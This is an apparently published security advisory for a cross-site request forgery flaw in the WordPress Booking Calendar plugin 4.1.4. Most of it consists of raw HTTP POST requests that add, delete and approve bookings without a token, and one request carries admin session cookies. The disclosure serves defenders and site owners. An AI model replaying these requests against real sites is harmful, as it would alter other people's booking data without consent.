Booking Calendar 4.1.4 Cross Site Request Forgery

2013.08.06
Credit: Dylan Irzi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

########################################################################################### # Exploit Title: CSRF Plugin Booking Calendar 4.1.4 WordPress # Date: 04 de Agosto del 2013 # Exploit Author: Dylan Irzi # Credit goes for: websecuritydev.com # Vendor Homepage: http://wpbookingcalendar.com/ # Tested on: Win8 & Linux Mint # Affected Version : 4.1.4 # # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/} # Greetz: all team WebSecuritydev. ########################################################################################### CSRF VIA POST. A&#241;adir nuevo. http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php POST: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation Content-Length: 311 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ----------------------------------------------------------- ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi% 40gmail.com ~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- Delete: Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php Post: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions Content-Length: 104 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache --------------------------- ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- << Aprobar Evento >> URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php POST: Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18 Accept: */* Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions Content-Length: 128 Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271; wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b; PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache --------------------------------------------------------- ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES --------------------------------------------------------- --------------------------------------------------------- -- *By Dylan Irzi @Dylan_Irzi11 Pentest de Seguridad. WhiteHat. *

References:

http://wpbookingcalendar.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top